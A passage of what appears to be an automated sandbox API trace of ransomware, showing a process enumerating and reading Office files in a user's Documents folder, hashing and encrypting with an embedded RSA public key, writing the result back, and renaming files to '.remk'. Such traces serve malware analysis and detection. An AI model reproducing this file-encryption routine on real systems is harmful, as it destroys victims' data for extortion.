Flags=0x0, Size=0xc) returned 0x31eea90 [0235.300] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.301] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x14780, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.301] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.302] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.302] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.302] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.302] CloseHandle (hObject=0x640) returned 1 [0235.304] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\ypHLBtyzIYe9W.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\yphlbtyziye9w.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\ypHLBtyzIYe9W.xlsx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\yphlbtyziye9w.xlsx.remk")) returned 1 [0235.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.305] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0235.307] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfec43cd0, ftCreationTime.dwHighDateTime=0x1d5e414, ftLastAccessTime.dwLowDateTime=0x78b6f80, ftLastAccessTime.dwHighDateTime=0x1d5e7f5, ftLastWriteTime.dwLowDateTime=0x78b6f80, ftLastWriteTime.dwHighDateTime=0x1d5e7f5, nFileSizeHigh=0x0, nFileSizeLow=0x17bd3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZsUtmR05.pptx", cAlternateFileName="ZSUTMR~1.PPT")) returned 1 [0235.307] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\ZsUtmR05.pptx") returned=".pptx" [0235.307] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\ZsUtmR05.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\zsutmr05.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.308] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=97235) returned 1 [0235.308] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.311] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x17bad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.311] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.313] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x17bd3, lpOverlapped=0x0) returned 1 [0235.315] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.315] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.315] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.315] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.316] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.316] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.316] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.316] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.316] GetLastError () returned 0x0 [0235.316] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.316] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.316] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.316] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.316] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x17bd0) returned 0x37c6278 [0235.317] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cb60 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea48 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cba8 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea60 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea90 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeaf0 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeaa8 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.318] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaa8 | out: hHeap=0x630000) returned 1 [0235.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaf0 | out: hHeap=0x630000) returned 1 [0235.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeaf0 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31eeaa8 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0235.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31eea90 [0235.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0235.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaa8 | out: hHeap=0x630000) returned 1 [0235.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaf0 | out: hHeap=0x630000) returned 1 [0235.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0235.319] GetCurrentThreadId () returned 0x314 [0235.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c4440 [0235.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.320] GetCurrentThreadId () returned 0x314 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x3192918 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeaf0 [0235.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea90 [0235.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeaa8 [0235.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea78 [0235.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eead8 [0235.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0235.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeac0 [0235.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc420 [0235.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc438 [0235.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc420 | out: hHeap=0x630000) returned 1 [0235.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc420 [0235.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeac0 | out: hHeap=0x630000) returned 1 [0235.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0235.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea90 [0235.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaf0 | out: hHeap=0x630000) returned 1 [0235.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0235.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc438 | out: hHeap=0x630000) returned 1 [0235.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0235.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0235.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0235.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0235.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc420 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eead8 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaa8 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea78 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea60 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325cba8 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.326] WriteFile (in: hFile=0x640, lpBuffer=0x37c6278*, nNumberOfBytesToWrite=0x17bce, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c6278*, lpNumberOfBytesWritten=0x3adfb14*=0x17bce, lpOverlapped=0x0) returned 1 [0235.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c6278 | out: hHeap=0x630000) returned 1 [0235.326] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x17bd3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.326] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0235.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 